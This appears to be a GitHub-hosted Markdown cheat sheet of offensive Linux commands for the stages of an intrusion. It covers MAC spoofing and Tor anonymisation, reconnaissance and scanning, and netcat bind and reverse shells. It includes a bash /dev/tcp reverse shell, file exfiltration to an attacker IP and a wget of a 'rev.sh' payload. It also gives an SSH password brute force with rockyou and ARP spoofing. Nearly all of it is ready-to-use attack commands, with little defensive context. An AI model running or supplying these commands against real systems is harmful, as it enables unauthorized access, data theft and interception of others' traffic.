Skip to content

Latest commit

 

History

History
266 lines (183 loc) · 3.73 KB

File metadata and controls

266 lines (183 loc) · 3.73 KB

Pre-Intrusion phase (Linux)

Prepare

Change MAC Address

ip link set dev eth0 down
macchanger -m 12:23:34:45:56:67 eth0
ip link set dev eth0 up

Static ip configuration

ip addr add 10.5.23.56/24 dev eth0

Proxychains with Tor

systemctl start tor
  • stop: Used to stop tor services
  • restart: Used to restart tor services
proxychains curl http://ifconfig.me/ip

Use proxychains before running any cmd

Reconnaissance

Passive

whois to query WHOIS servers

whois <target>

nslookup to query DNS servers

nslookup <target>
nslookup -type=A <target> 1.1.1.1

dig to query DNS servers

dig <target>
dig @1.1.1.1 <target> TXT

Online:

Active

Web Browser:

  • Chrome DevTools
  • FoxyProxy (change the proxy server)
  • User-Agent Switcher and Manager (pretend to different OS/browser)
  • Wappalyzer (technologies used)

Test connection and DNS information

ping <target>
traceroute/tracert <target>

Communicate with host

telnet <target> <port>
GET / HTTP/1.1
host: telnet
nc <target> <port>
GET / HTTP/1.1
host: netcat

Enumeration

Finds subdomains of a web server

nmap -sn -Pn --script=hostmap-crtsh <target>

combine various sources for subdomain enum

amass enum -src -brute -min-for-recursive 2 -d <target>

Scanning

Nmap

nmap -A -T4 <target>
  • -sV: Probe open ports to determine service/version info
  • -O: Enable OS detection
  • -p <port ranges>: Only scan specified ports
  • -sC: equivalent to --script=default
  • -A: Enable OS detection, version detection, script scanning, and traceroute
  • --script=vuln: detect vulnerability script on target

image

Masscan

masscan -p80,8000-8100 --rate 20000 10.0.0.0/8

GoBuster

gobuster dir -u <url> -w /usr/share/wordlists/dirb/common.txt -t 30
  • dir – (scan for directories).
  • -u: Target URL.
  • -w: the wordlist we are using to scan

Dirb

???

Nikto

nikto -host <target>

Exploitation

Searchsploit

searchsploit <keyword>
  • -m: mirror download the exploit
  • -u: show url to its CVE

requests lib error for python2

git clone https://github.com/kennethreitz/requests
cd requests && python setup.py
pip3 install --force-reinstall requests
pip3 install --ignore-installed requests

Metaspoit

msfconsole

HTTP Server

python3 -m http.server
wget <your_ip>:8000/rev.sh

Netcat

connect

# attacker before
nc -lvnp 4444
# client after
nc <rhost> 4444
  • -l: Listen
  • -v: Verbose
  • -n: Do not use DNS
  • -p: What port to listen on

bind shell

# client before
nc -lvnp 4444 -e "/bin/bash -i"
# attacker after
nc <rhost> 4444

reverse shell

# attacker before
nc -lvnp 4444
# client after
nc <rhost> 4444 -e "/bin/bash -i"

Bash

# reverse shell
bash -i >& /dev/tcp/<your_ip>/4444 0>&1
# file upload
bash -c 'cat $LFILE > /dev/tcp/<your_ip>/4444'
# file download
bash -c 'cat < /dev/tcp/<your_ip>/4444 > file.txt'

Upgrade pseudo terminal

python3 -c 'import pty; pty.spawn("/bin/bash")'

Ncrack

Bruteforce SSH password

ncrack -p22 --user root -P /usr/share/wordlists/rockyou.txt <target>

Sniffing

ARP spoofing

arpspoof -t 10.10.10.24 10.10.10.25

ARP cache

# show cache
ip neigh
# delete cache
ip neigh flush all

image

image